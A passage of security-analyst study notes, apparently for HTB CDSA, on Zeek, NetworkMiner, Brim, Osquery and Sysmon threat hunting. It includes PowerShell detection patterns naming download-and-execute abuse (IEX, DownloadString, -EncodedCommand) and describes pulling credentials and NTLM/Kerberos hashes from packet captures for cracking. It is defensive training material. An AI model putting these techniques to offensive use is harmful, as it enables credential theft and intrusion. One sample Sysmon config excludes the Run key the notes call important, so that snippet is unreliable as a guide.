 {
 if (state$sig_id == "ftp-admin")
 {
 print ("Signature hit! -- #FTP-Admin ");
 }
 }
The signature is shown below.
 signature ftp-admin {
 ip-proto == tcp
 ftp /.*USER.*admin.*/
 event "FTP Username Input Found!"
 }
Combined together
 zeek -C -r ftp.pcap -s ftp-admin.sig 201.zeek
Zeek Frameworks
Frameworks are used in Zeek scripts to extend Zeek's
functionality and provide further event analysis,
extraction and correlation.
Frameworks are called inside scripts with the  @load
keyword and the framework path:  @load
base/frameworks/framework-name . Below is an
example of a script that calls the file hash framework to
create hashes of the files extracted from a given PCAP.
 # Enable MD5, SHA1 and SHA256 hashing for all
 files.
 @load base/files/hash
 event file_new(f: fa_file)
 {
 Files::add_analyzer(f, Files::ANALYZER_MD5);
 Files::add_analyzer(f, Files::ANALYZER_SHA1);
 Files::add_analyzer(f,
 Files::ANALYZER_SHA256);
 }
Then from the command line, we can call the framework
 zeek -C -r case1.pcap
 /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
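What the hash framework does for each extracted file can be approximated in a few lines of Python; the file contents below are made up for illustration:

```python
import hashlib

# The framework attaches MD5, SHA1 and SHA256 analyzers to every
# extracted file; this sketch reproduces that hashing step on raw bytes
data = b"example extracted file contents"

digests = {
    "md5": hashlib.md5(data).hexdigest(),
    "sha1": hashlib.sha1(data).hexdigest(),
    "sha256": hashlib.sha256(data).hexdigest(),
}

for algo, value in digests.items():
    print(algo, value)
```

Zeek records these digests in files.log, which lets analysts pivot to threat-intelligence lookups on the hash values.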
Zeek Package Manager
Zeek Package Manager helps users install third-party
scripts and plugins to extend Zeek functionalities with
ease. The package manager is installed with Zeek and
available with the   zkg   command. Users can install,
load, remove, update and create packages with the "zkg"
tool. You can read more about zkg and view the available
packages online. Please note that you need root
privileges to use the "zkg" tool.
There are multiple ways of using packages. The first
approach is using them as frameworks and calling specific
package path/directory per usage.
 zeek -Cr http.pcap
 /opt/zeek/share/zeek/site/package-name
The second and most common approach is calling packages
from a script with the "@load" method inside a script
 @load /opt/zeek/share/zeek/site/zeek-sniffpass
The third and final approach to using packages is calling
their package names; note that this method works only
for packages installed with the "zkg" install method.
 zeek -Cr http.pcap zeek-sniffpass
Install a package. Example (zkg install zeek/j-
gras/zeek-af_packet-plugin)
 zkg install package_path
Install a package from a git URL. Example (zkg install
https://github.com/corelight/ztest)
 zkg install git_url
List installed packages
 zkg list
Remove an installed package
 zkg remove
Check version updates for installed packages
 zkg refresh
Update installed packages
 zkg upgrade
Network Miner
Definition
NetworkMiner is an open source Network Forensic Analysis
Tool (NFAT) for Windows (but also works in Linux / Mac
OS X / FreeBSD).
NetworkMiner can be used as a passive network
sniffer/packet capturing tool to detect operating systems,
sessions, hostnames, open ports etc. without putting any
traffic on the network.
Network Miner can also parse PCAP files for off-line
analysis and to regenerate/reassemble transmitted files
and certificates from PCAP files.
Use Cases of Network Miner
     Traffic sniffing: It can intercept the traffic, sniff it,
     and collect and log packets that pass through the
     network.
     Parsing PCAP files: It can parse pcap files and show
     the content of the packets in detail.
     Protocol analysis: It can identify the used protocols
     from the parsed pcap file.
     OS fingerprinting: It can identify the used OS by
     reading the pcap file. This feature strongly relies
     on Satori and p0f.
      File Extraction: It can extract images, HTML files
     and emails from the parsed pcap file.
     Credential grabbing: It can extract credentials from
     the parsed pcap file.
     Clear text keyword parsing: It can extract cleartext
     keywords and strings from the parsed pcap file.
Operating Modes
      Sniffer Mode: Although it has a sniffing feature, it is
      not intended to be used as a sniffer. The sniffing
      feature is available only on Windows, while the rest of
      the features are available on both Windows and Linux.
      Based on experience, the sniffing feature is not as
      reliable as the other features; therefore we suggest not
      using this tool as a primary sniffer. Even the official
      description mentions that the tool is a
      "Network Forensics Analysis Tool" that can be
      used as a "sniffer". In other words, it is a Network
      Forensic Analysis Tool with a sniffer feature,
      but it is not a dedicated sniffer like Wireshark or
      tcpdump.
     Packet Parsing/Processing: Network Miner can parse
     traffic captures to have a quick overview and
     information on the investigated capture. This
     operation mode is mainly suggested to grab the "low
     hanging fruit" before diving into a deeper
     investigation.
Tool Components
File Menu
The file menu helps you load a Pcap file or receive Pcap
over IP; you can also drag and drop pcap files. These notes
suggest using NetworkMiner as an initial investigation tool
for grabbing the low-hanging fruit and getting a traffic
overview, so we skip receiving Pcaps over IP here. You can
read more about receiving Pcap over IP in the NetworkMiner
documentation.
Tools Menu
The tools menu helps you clear the dashboard and remove
the captured data.
Case Panel
The case panel shows the list of the investigated pcap
files. You can reload/refresh, view metadata details and
remove loaded files from this panel.
Hosts
The "hosts" menu shows the identified hosts in the pcap
file. This section provides information on;
     IP address
     MAC address
     OS type
     Open ports
     Sent/Received packets
Incoming/Outgoing sessions
Host details
OS fingerprinting uses the Satori GitHub repo and p0f,
and the MAC address database uses the mac-ages
GitHub repo.
You can sort the identified hosts by using the sort
menu. You can change the colour of the hosts as
well. Some of the features (OSINT lookup) are
available only in premium mode. The right-click menu
also helps you to copy the selected value.
Sessions
The session menu shows detected sessions in the
pcap file. This section provides information on;
Frame number
Client and server address
Source and destination port
Protocol
Start time
You can search for keywords inside frames with the
help of the filtering bar. It is possible to filter
specific columns of the session menu as well. This
menu accepts four types of inputs;
"ExactPhrase"
"AllWords"
"AnyWord"
"RegExe"
DNS
The DNS menu shows DNS queries with details. This
section provides information on;
Frame number
Timestamp
Client and server
Source and destination port
IP TTL
DNS time
Transaction ID and type
DNS query and answer
Alexa Top 1M
Credentials
The credentials menu shows extracted credentials
and password hashes from investigated pcaps. You
can use Hashcat (GitHub) and John the
Ripper (GitHub) to decrypt extracted credentials.
NetworkMiner can extract credentials including;
Kerberos hashes
NTLM hashes
RDP cookies
HTTP cookies
HTTP requests
IMAP
FTP
SMTP
MS SQL
The right-click menu is helpful in this part as well.
You can easily copy the username and password
values.
Files
The files menu shows extracted files from
investigated pcaps. This section provides information
on;
Frame number
Filename
Extension
Size
Source and destination address
Source and destination port
Protocol
Timestamp
Reconstructed path
Details
Some features (OSINT hash lookup and sample
submission) are available only in premium mode. The
search bar is available here as well. The right-click
menu is helpful in this part as well. You can easily
open files and folders and view the file details in-
depth.
Images
The images menu shows extracted images from
investigated pcaps. The right-click menu is helpful in
this part as well. You can open files and zoom in &
out easily.
Once you hover over the image, it shows the file's
detailed information (source & destination address
and file path).
Parameters
The parameters menu shows extracted parameters from
investigated pcaps. This section provides information
on;
Parameter name
Parameter value
Frame number
Source and destination host
Source and destination port
Timestamp
Details
The right-click menu is helpful in this part as well.
You can copy the parameters and values easily.
Keywords
The keywords menu shows extracted keywords from
investigated pcaps. This section provides information
on;
Frame number
Timestamp
Keyword
Context
Source and destination host
source and destination port
How to filter keywords;
Add keywords
Reload case files!
Note: You can filter multiple keywords in this
section; however, you must reload the case files
after updating the search keywords. Keyword search
investigates all possible data in the processed
pcaps.
Messages
The messages menu shows extracted emails, chats
and messages from investigated pcaps. This section
provides information on;
Frame number
Source and destination host
Protocol
Sender (From)
Receiver (To)
Timestamp
Size
Once you filter the traffic and get a hit, you will
discover additional details like attachments and
attributes on the selected message. Note that the
search bar is available here as well. The right-click
menu is available here. You can use the built-in
viewer to investigate overall information and the
"open file" option to explore attachments.
Anomalies
The anomalies menu shows detected anomalies in the
      processed pcap. Note that NetworkMiner isn't
      designed to be an IDS. However, the developers added
      some detections for the EternalBlue exploit and
      spoofing attempts.
Brim
Definition
Brim is an open-source desktop application that processes
pcap files and log files. Its primary focus is providing
search and analytics. It uses the Zeek log processing
format. It also supports Zeek signatures and Suricata
rules for detection.
Input Formats
     Packet Capture Files: Pcap files created with
     tcpdump, tshark and Wireshark like applications.
     Log Files: Structured log files like Zeek logs.
     In the below screenshot, we can see:
     Pools: Data resources, investigated pcap and log
     files.
     Queries: List of available queries. Queries help us
     correlate findings and find the event of interest.
     Queries can have names, tags and descriptions. The
     query library lists the query names; once you
     double-click a query, the actual query is passed to
     the search bar, executed, and listed under the
     history tab.
History: List of launched queries.
The timeline provides information about capture start
and end dates.
The rest of the log details are shown in the right
pane and provides details of the log file fields. Note
that you can always export the results by using the
export function located near the timeline.
Below, you can correlate each log entry by reviewing
the correlation section at the log details pane
(shown on the left image). This section provides
information on the source and destination addresses,
duration and associated log files. This quick
information helps you answer the "Where to look
next?" question and find the event of interest and
linked evidence.
Queries in Detail
Reviewing Overall Activity
This query provides general information on the pcap file.
The provided information is valuable for accomplishing
further investigation and creating custom queries. It is
impossible to create advanced or case-specific queries
without knowing the available log files.
The image on the left shows that there are 20 logs
generated for the provided pcap file.
Windows Specific Networking Activity
This query focuses on Windows networking activity and
details the source and destination addresses and named
pipe, endpoint and operation detection. The provided
information helps investigate and understand specific
Windows events like SMB enumeration, logins and service
exploiting.
Unique Network Connections and Transferred Data
These two queries provide information on unique
connections and connection-data correlation. The provided
info helps analysts detect odd and malicious connections
as well as suspicious beaconing activities. The unique list
provides a clear view of unique connections that helps
identify anomalies, while the data list summarizes the
data transfer rates that support the anomaly investigation
hypothesis.
DNS and HTTP Methods
These queries provide the list of the DNS queries and HTTP
methods. The provided information helps analysts to
detect anomalous DNS and HTTP traffic. You can also
narrow the search by viewing the "HTTP POST" requests
with the available query and modifying it to view the
"HTTP GET" methods.
File Activity
This query provides the list of the available files. It helps
analysts to detect possible data leakage attempts and
suspicious file activity. The query provides info on the
detected file MIME and file name and hash values (MD5,
SHA1).
IP Subnet Statistics
This query provides the list of the available IP subnets. It
helps analysts detect possible communications outside the
scope and identify out of ordinary IP addresses.
Suricata Alerts
These queries provide information based on Suricata rule
results. Three different queries are available to view the
available logs in different formats (category-based,
source and destination-based, and subnet based).
Custom Queries
Example of custom query
Below we can use the  _path  keyword to specify a log
file to search. Notice we used the  ==  operator and
the  |  pipe to pass the output to another command,
 cut , which allows us to select and display certain
fields.
 _path=="conn" | cut geo.resp.country_code,
 geo.resp.region, geo.resp.city
Basic search
Find logs containing an IP address or any value.
 10.0.0.1
Logical operators
 and, or, not
Filter values
 "field name" == "value"
Count field values
 count () by "field"
Count the number of entries per log file type and sort in
reverse (descending) order.
 count () by _path | sort -r
Cut specific field from a log file
 _path=="conn" | cut "field name"
List unique values
 uniq
Investigative Queries
Communicated Hosts
This approach will help analysts to detect possible access
violations, exploitation attempts and malware infections.
 _path=="conn" | cut id.orig_h, id.resp_h |
 sort | uniq
Frequently Communicated Hosts
This will help security analysts to detect possible data
exfiltration, exploitation and backdooring activities.
 _path=="conn" | cut id.orig_h, id.resp_h |
 sort | uniq -c | sort -r
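The sort | uniq -c | sort -r pipeline above can be mimicked in Python with a Counter; the host pairs below are hypothetical, not real conn.log data:

```python
from collections import Counter

# Hypothetical (id.orig_h, id.resp_h) pairs from a conn.log
conns = [
    ("10.0.0.5", "192.168.1.10"),
    ("10.0.0.5", "192.168.1.10"),
    ("10.0.0.5", "192.168.1.10"),
    ("10.0.0.7", "8.8.8.8"),
]

# Equivalent of: cut id.orig_h, id.resp_h | sort | uniq -c | sort -r
for (orig, resp), count in Counter(conns).most_common():
    print(count, orig, resp)
```

A pair with an unusually high count is a candidate for beaconing or data-exfiltration follow-up.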
Most Active Ports
Investigating the most active ports will help analysts to
detect silent and well-hidden anomalies by focusing on the
data bus and used services.
[1]
  _path=="conn" | cut id.resp_p, service | sort
 | uniq -c | sort -r count
[2]
 _path=="conn" | cut id.orig_h, id.resp_h,
 id.resp_p, service | sort id.resp_p | uniq -c
 | sort -r
Long Connections
For security analysts, the long connections could be the
first anomaly indicator. If the client is not designed to
serve a continuous service, investigating the connection
duration between two IP addresses can reveal possible
anomalies like backdoors.
 _path=="conn" | cut id.orig_h, id.resp_p,
 id.resp_h, duration | sort -r duration
Transferred Data
Another essential point is calculating the transferred data
size. If the client is not designed to serve and receive
files and act as a file server, it is important to
investigate the total bytes for each connection. Thus,
analysts can distinguish possible data exfiltration or
suspicious file actions like malware downloading and
spreading.
 _path=="conn" | put total_bytes := orig_bytes
 + resp_bytes | sort -r total_bytes | cut uid,
 id, orig_bytes, resp_bytes, total_bytes
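The same computation can be sketched in Python over hypothetical conn.log entries (the field names mirror Zeek's conn.log; the values are invented):

```python
# Hypothetical conn.log entries
conns = [
    {"uid": "C1", "orig_bytes": 1200, "resp_bytes": 45_000_000},
    {"uid": "C2", "orig_bytes": 300, "resp_bytes": 900},
]

# put total_bytes := orig_bytes + resp_bytes
for c in conns:
    c["total_bytes"] = c["orig_bytes"] + c["resp_bytes"]

# sort -r total_bytes | cut uid, total_bytes
ranked = sorted(conns, key=lambda c: c["total_bytes"], reverse=True)
for c in ranked:
    print(c["uid"], c["total_bytes"])
```

The connection that moved 45 MB dwarfs the rest and would be the first candidate for an exfiltration or malware-download review.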
DNS and HTTP Queries
Identifying suspicious and out of ordinary domain
connections and requests is another significant point for a
security analyst. Abnormal connections can help
detect C2 communications and possible
compromised/infected hosts. Identifying the
suspicious DNS queries and HTTP requests help security
analysts to detect malware C2 channels and support the
investigation hypothesis.
[1]
 _path=="dns" | count () by query | sort -r
[2]
 _path=="http" | count () by uri | sort -r
Suspicious Hostnames
Identifying suspicious and out of ordinary hostnames helps
analysts to detect rogue hosts. Investigating
the DHCP logs provides the hostname and domain
information.
 _path=="dhcp" | cut host_name, domain
Suspicious IP Addresses
 _path=="conn" | put classnet :=
 network_of(id.resp_h) | cut classnet | count()
 by classnet | sort -r
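Brim's network_of() groups addresses into subnets; a rough Python stand-in using the stdlib ipaddress module is shown below (the /24 grouping and the sample addresses are assumptions for illustration):

```python
import ipaddress
from collections import Counter

# Hypothetical responder addresses (id.resp_h) from a conn.log
resp_hosts = ["203.0.113.7", "203.0.113.99", "198.51.100.4"]

# Rough stand-in for network_of(): map each address to its /24 subnet
classnets = Counter(
    str(ipaddress.ip_network(f"{h}/24", strict=False)) for h in resp_hosts
)

# Equivalent of: count() by classnet | sort -r
for net, count in classnets.most_common():
    print(count, net)
```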
Detect Files
 filename!=null
SMB Activity
Another significant point is investigating the SMB activity.
This will help analysts to detect possible malicious
activities like exploitation, lateral movement and malicious
file sharing.
 _path=="dce_rpc" OR _path=="smb_mapping" OR
 _path=="smb_files"
Known Patterns
Known patterns represent alerts generated by security
solutions. These alerts are generated against the common
attack/threat/malware patterns and known by endpoint
security products, firewalls and IDS/IPS solutions. This
data source highly relies on available signatures, attacks
and anomaly patterns. Investigating available log sources
containing alerts is vital for a security analyst.
Brim supports the Zeek and Suricata logs, so any anomaly
detected by these products will create a log file.
Investigating these log files can provide a clue where the
analyst should focus.
 event_type=="alert" or _path=="notice" or
 _path=="signatures"
Module 5: Endpoint Security and
Monitoring
OSquery
Definition
Osquery is an open-source agent that converts the
operating system into a relational database. It allows us
to ask questions of the tables using SQL queries, such as
returning the list of running processes, the user accounts
created on the host, or the processes communicating with
suspicious domains.
The SQL language implemented in Osquery is not the entire
SQL language you might be accustomed to; rather, it is a
superset of SQLite.
Realistically all your queries will start with
a SELECT statement. This makes sense because, with
Osquery, you are only querying information on an
endpoint. You won't be updating or deleting any
information/data on the endpoint.
In the Osquery interactive shell, all meta-commands are
prefixed with a dot ( . ).
Investigation methodology
When it comes to investigating an endpoint with Osquery,
we follow the below order:
     List the tables in the current Osquery installation
     on the endpoint.
     Highlight the table that contains the aspect of
     Windows we want to investigate. For example, when
     investigating processes we would look for the
     table that contains information about processes.
     Search for the table.
     Display its schema and columns.
     Start the investigation by displaying and querying
     data using the  SELECT  statement.
Entering the interactive mode
osqueryi
Display the help menu
.help
Displaying version and other values for
the current settings
.show
Change output mode
.mode [mode]
modes:
list
pretty
line
column
csv
Querying the version of Osquery
installed on a Windows endpoint
 SELECT version FROM osquery_info;
Checking the available tables
 .tables
Displaying tables containing specific
aspect of windows
This is useful if you want to list and search the tables
associated with processes, users, etc.
 .tables user
 .tables process
 .tables network
Displaying and querying the columns of
a table
 .schema table_name
Display information about running
processes
Assuming the table that contains details about processes
is   processes
 SELECT * FROM processes;
We can also query specific columns from the table
processes
Example [1]
 SELECT pid, name, path FROM processes;
Example [2]
 SELECT pid, name, path FROM processes WHERE
 name='lsass.exe';
Display number of running processes
The   count(*)    can be used to display the count or
number of entries for any table. Below is an example for
the   processes   table
 SELECT count(*) from processes;
Join the results of two tables (requires
one common column)
OSquery can also be used to join two tables based on a
column that is shared by both tables
 SELECT pid, name, path FROM osquery_info JOIN
 processes USING (pid);
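Because Osquery's SQL dialect is built on SQLite, the queries above can be rehearsed against a mock processes table using Python's sqlite3 module; the rows below are invented for illustration, not real endpoint data:

```python
import sqlite3

# In-memory stand-in for Osquery's processes table (columns simplified)
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE processes (pid INTEGER, name TEXT, path TEXT)")
db.executemany(
    "INSERT INTO processes VALUES (?, ?, ?)",
    [
        (4, "System", ""),
        (652, "lsass.exe", r"C:\Windows\System32\lsass.exe"),
        (1337, "powershell.exe",
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ],
)

# SELECT pid, name, path FROM processes WHERE name='lsass.exe';
row = db.execute(
    "SELECT pid, name, path FROM processes WHERE name='lsass.exe'"
).fetchone()
print(row)

# SELECT count(*) FROM processes;
count = db.execute("SELECT count(*) FROM processes").fetchone()[0]
print(count)
```

The same SELECT statements run unchanged inside osqueryi against the real processes table.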
Investigate services such as windows
defender
 select name,description from services where
 name like "WinD%";
Investigate windows defender logs
 osquery> select eventid,datetime from
 win_event_log_data where source =
 "Applications and Services Logs-Microsoft-
 Windows-Windows Defender/Operational" and
 eventid like '1116' ;
Investigate sysmon logs
 select eventid from win_event_log_data where
 source="Microsoft-Windows-Sysmon/Operational"
 order by datetime limit 1;
Investigate Browsers
Investigating Chrome Extensions
First, we list the schema (table description) of
the chrome_extensions table.
 .schema chrome_extensions
Based on the output, lets say we are interested in
identifier    and   name   from the table;
 SELECT identifier as id, name FROM
 chrome_extensions;
Links
     https://osquery.io/schema/
     https://github.com/trailofbits/osquery-
     extensions/blob/master/README.md
     https://osquery.readthedocs.io/en/stable/
Sysmon
Definition
Sysmon (System Monitor) is a Windows system service
and driver developed by Microsoft as part of the
Sysinternals suite. Sysmon provides advanced logging of
Windows system events, including process creation,
network connections, file creation, and registry
modifications. These logs are invaluable for detecting
suspicious behavior, conducting forensic investigations,
and improving overall endpoint security.
Sysmon operates by monitoring and logging activity at a
granular level, which it then outputs to Windows Event
Logs, making it possible to centralize and analyze logs
using tools like SIEMs (e.g., Splunk, ELK Stack) or local
analysis with Windows Event Viewer.
What Can You Do with Sysmon?
     Process Creation Logging: Captures detailed
     information about each process, including command-
     line arguments.
     Network Connection Logging: Tracks incoming and
     outgoing connections, showing source and
     destination IP addresses and ports.
     File Creation and Time Change Events: Logs the
     creation of new files and any changes to file
     timestamps.
     Registry Monitoring: Tracks changes to the registry,
     an area often targeted by malware.
     DLL Loading: Logs Dynamic Link Library (DLL) loads
     by each process, which can help detect malicious
     code injection.
How to Install and Configure Sysmon
Here’s a step-by-step guide on installing and configuring
Sysmon on Windows.
Step 1: Download Sysmon
    1. Visit the Sysinternals Suite website.
    2. Download the Sysmon zip file and extract it to a
       preferred directory on your system.
Step 2: Install Sysmon
Sysmon installation requires specifying a configuration file
that defines the types of events to log. Sysmon can run
with or without a config file, but using one is
recommended to fine-tune what Sysmon will monitor and
log.
     Basic installation command (without a config file):
 sysmon -accepteula -i
Installation with a configuration file:
 sysmon -accepteula -i sysmonconfig.xml
This command installs Sysmon and starts it with the
configuration file specified (   sysmonconfig.xml ).
Step 3: Create or Download a Configuration
File
A configuration file tells Sysmon what to log and how to
filter events. You can create one from scratch, but there
are several community configurations optimized for
security logging. One popular configuration file is from
SwiftOnSecurity, which provides an optimized configuration
that includes filtering for common noise and logs important
events.
    1. SwiftOnSecurity’s Sysmon Config:
            Visit SwiftOnSecurity’s SysmonConfig GitHub
            page.
            Download the latest version of the XML file.
    2. Modify Configuration as Needed:
            Open the configuration file in a text editor and
            modify as needed. The config defines which
            processes, connections, file changes, and
            registry modifications to monitor.
Step 4: Start Sysmon with the
Configuration File
Once you have the configuration file ready, install Sysmon
with it:
 sysmon -accepteula -i sysmonconfig.xml
Step 5: Verify Sysmon Installation
   1. Open Event Viewer:
              Go to  Applications and Services Logs >
               Microsoft > Windows > Sysmon >
               Operational .
   2. Check for events to ensure Sysmon is running and
      logging as expected. Sysmon events are prefixed
      with “Sysmon Event” in Event Viewer.
Configuring and Tuning Sysmon
The configuration file can be modified to customize which
events Sysmon logs, filtering out noisy events, and
focusing on relevant security activities. Here are some
useful configuration options:
   1. Process Creation (    Event ID 1 ):   Logs every time
      a process is created.
             Useful fields include  ProcessId , Image
             (path to   executable), and CommandLine       (full
             command used).
   2. Network Connections (       Event ID 3 ):   Captures all
      network connection events.
             Logs details like SourceIp ,
               DestinationIp , SourcePort , and
               DestinationPort .
   3. File   Creation Time Change ( Event ID 2 ): Detects
      timestamp changes on files, often used by malware
       to cover tracks.
    4. Registry Events (   Event ID 12, 13, 14 ):
       Monitors registry changes, including key and value
       modifications.
    5. File Creation (   Event ID 11 ):   Logs new files
       created on the system.
    6. Image Loading (    Event ID 7 ):   Logs DLL loads for
       each process, useful for detecting code injection
       attacks.
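A detection along these lines can be sketched in Python over hypothetical, already-parsed Sysmon events (the field names follow Sysmon's schema, but the events themselves are made up for illustration):

```python
# Hypothetical parsed Sysmon events (Event ID 1 = process creation,
# Event ID 3 = network connection)
events = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand SQBFAFgA"},
    {"EventID": 3, "Image": r"C:\Program Files\app.exe",
     "CommandLine": ""},
]

# Flag process-creation events using PowerShell's -EncodedCommand switch,
# a common indicator of obfuscated PowerShell abuse
suspicious = [
    e for e in events
    if e["EventID"] == 1 and "-EncodedCommand" in e["CommandLine"]
]
print(len(suspicious))  # -> 1
```

In practice the same filter would be expressed as a SIEM query or the Get-WinEvent pipeline shown below it.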
Example Configuration Snippet
Here is a simplified snippet to include in the XML file:
 <Sysmon schemaversion="4.90">
     <!-- schemaversion should match your installed Sysmon build -->
     <EventFiltering>
         <!-- Process Creation -->
         <ProcessCreate onmatch="include">
             <CommandLine condition="contains">powershell</CommandLine>
             <CommandLine condition="contains">cmd.exe</CommandLine>
         </ProcessCreate>
         <!-- Network Connection -->
         <NetworkConnect onmatch="include">
             <DestinationIp condition="is">192.168.1.100</DestinationIp>
         </NetworkConnect>
         <!-- Registry Modification -->
         <RegistryEvent onmatch="exclude">
             <TargetObject condition="contains">\Software\Microsoft\Windows\CurrentVersion\Run</TargetObject>
         </RegistryEvent>
     </EventFiltering>
 </Sysmon>
Updating Sysmon
To update Sysmon with a new configuration:
 sysmon -c sysmonconfig.xml
This command updates Sysmon without reinstalling it,
applying the new configuration immediately.
Uninstalling Sysmon
If you need to uninstall Sysmon, use:

 sysmon -u

This will remove the Sysmon service and driver from your
system, along with its configuration settings.
Creating Alerts for High-Value Events
Once Sysmon is running, configure alerts for specific
events that often indicate malicious activity. Here are
some key alerts to consider:
Process Creation Alerts
   PowerShell Execution: PowerShell is often used in
   attacks, so monitor for PowerShell usage with
   suspicious command-line arguments (e.g.,     -
   EncodedCommand ).
   Unusual Parent-Child Processes: Alert on uncommon
   parent-child process relationships, such as
   winword.exe    spawning       powershell.exe ,   which
   may indicate document-based malware.
   Example PowerShell query for PowerShell abuse:
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -eq 1 -and $_.Message -match "powershell" -and $_.Message -match "-EncodedCommand" }
Network Connection Alerts
   Suspicious Outbound Connections: Look for
   connections to high-risk IPs, unusual destinations,
   or unexpected protocols.
   Uncommon Ports: Alert on outbound connections over
   uncommon ports (e.g., non-standard ports for
   HTTP/HTTPS), which can indicate C2 communication
   or data exfiltration.
   Example PowerShell query for suspicious network
   connections:
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -eq 3 -and $_.Message -match "ExternalIPAddress" }
Replace   "ExternalIPAddress"           with a known malicious
IP or IP range.
Registry Modification Alerts
Monitor registry changes in keys related to persistence,
such as
HKCU\Software\Microsoft\Windows\CurrentVersion\R
un .
Example PowerShell query for autorun registry
modifications:
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -in 12, 13, 14 -and $_.Message -match "CurrentVersion\\Run" }
Parsing Sysmon Logs with PowerShell
Get-Sysmonlogs   is not an official cmdlet; the name
usually refers to using PowerShell to retrieve and parse
Sysmon logs from the Windows event log. Since Sysmon logs
are stored in Event Viewer under "Applications and
Services Logs > Microsoft > Windows > Sysmon", we can use
PowerShell's   Get-WinEvent   to access and filter these
logs efficiently.
1. Basic Retrieval of Sysmon Logs
                            376 / 547
                           HTB CDSA
To retrieve all Sysmon logs, use:
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational"
This command pulls all events from the Sysmon log.
2. Filter Sysmon Logs by Event ID
Sysmon uses specific event IDs for different types of
activities, such as process creation, network connection,
registry changes, etc. You can filter logs by these IDs to
retrieve specific types of events.
For example, to retrieve process creation events (     Event
ID 1 ):
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object {$_.Id -eq 1}
Or for network connection events (     Event ID 3 ):
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object {$_.Id -eq 3}
3. Retrieve Sysmon Logs within a Specific
Date Range
To get Sysmon logs within a specific date range, use the
-FilterHashtable     parameter:
                           377 / 547
                           HTB CDSA
 $startDate = (Get-Date).AddDays(-7)   # 7 days ago
 $endDate = Get-Date
 Get-WinEvent -FilterHashtable @{ LogName = "Microsoft-Windows-Sysmon/Operational"; StartTime = $startDate; EndTime = $endDate }
This will retrieve logs from the last seven days.
4. Filter Sysmon Logs by Keywords
You can filter Sysmon logs to include only entries
containing specific keywords, such as "powershell" or
"cmd.exe" in command-line activity. Here’s how:
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Message -match "powershell" }
5. Display Sysmon Logs in a Table
To make the output more readable, format it in a table
view:
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Select-Object TimeCreated, Id, Message |
     Format-Table -AutoSize
6. Export Sysmon Logs to a CSV File
If you need to analyze Sysmon logs further or share them,
you can export them to a CSV file:
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Select-Object TimeCreated, Id, Message |
     Export-Csv -Path "C:\SysmonLogs.csv" -NoTypeInformation -Encoding UTF8
This saves the Sysmon logs with the timestamp, event ID,
and message details to a file named         SysmonLogs.csv .
7. Example: Advanced Filtering with
Multiple Conditions
To filter Sysmon logs for network connections (      Event ID
3)   where the destination IP is        192.168.1.10 :
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -eq 3 -and $_.Message -match "192.168.1.10" }
Automating with a Script
 # Define the time range for the past 24 hours
 $startDate = (Get-Date).AddDays(-1)
 $endDate = Get-Date

 # Retrieve Sysmon logs for the last 24 hours and export to CSV
 Get-WinEvent -FilterHashtable @{ LogName = "Microsoft-Windows-Sysmon/Operational"; StartTime = $startDate; EndTime = $endDate } |
     Select-Object TimeCreated, Id, Message |
     Export-Csv -Path "C:\SysmonLogs_24hrs.csv" -NoTypeInformation -Encoding UTF8

 Write-Output "Sysmon logs for the last 24 hours have been exported to C:\SysmonLogs_24hrs.csv"
Threat Hunting with Sysmon
Threat hunting with Sysmon involves proactively searching
for indicators of compromise (IoCs), suspicious
behaviors, and potential security incidents using the rich
data that Sysmon logs. This process helps identify
stealthy or advanced attacks that may bypass traditional
security defenses.
Sysmon logs several events that are particularly useful for
threat hunting. Knowing these event types helps narrow
down searches and prioritize indicators.
     Event ID 1: Process Creation – Logs detailed
     information about each process creation event.
     Useful for detecting suspicious commands and tools.
     Event ID 3: Network Connection – Captures outgoing
     network connections. Essential for spotting
     communication with potential command and control
     (C2) servers.
     Event ID 7: Image Loaded – Logs DLLs loaded by
     processes. Good for detecting code injection
     techniques.
     Event ID 10: Process Access – Tracks processes
     accessing or modifying other processes. Useful for
     detecting process hollowing or similar attacks.
     Event ID 11: File Creation – Logs newly created files,
     which may indicate malware or unauthorized
     software installation.
     Event ID 12, 13, 14: Registry Modifications – Logs
     registry key creation, deletion, and modifications,
     useful for detecting persistence techniques.
     Event ID 19 and 20: WMI Event Filter and Consumer –
     Logs Windows Management Instrumentation (WMI)
     actions, often used for lateral movement.
Hunting for PowerShell Abuse
PowerShell is frequently abused by attackers for executing
malicious code. You can look for instances of PowerShell
being run with suspicious arguments.
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -eq 1 -and $_.Message -match "powershell" -and $_.Message -match "(Invoke-WebRequest|Invoke-Expression|IEX|DownloadString)" }
Detecting Suspicious Network Connections
Identify uncommon or suspicious network connections,
such as connections to external IPs over unusual ports or
known bad IP addresses.
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -eq 3 -and $_.Message -match "192.168.1.1" }   # Replace with known suspicious IP or range
This command can help filter for outbound connections,
which can indicate exfiltration or C2 communication.
Suspicious DLL Injection
Attackers may inject malicious DLLs into legitimate
processes to evade detection. Look for unusual DLL load
paths or known malicious DLLs.
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -eq 7 -and $_.Message -match "AppData\\Local" }
Since DLLs are typically loaded from       System32 , seeing
them load from directories like        AppData or Temp can be
a red flag.
Detecting Persistence Techniques (Registry
Monitoring)
Persistence can be achieved by modifying registry keys
related to autostart and scheduled tasks. Common keys
include
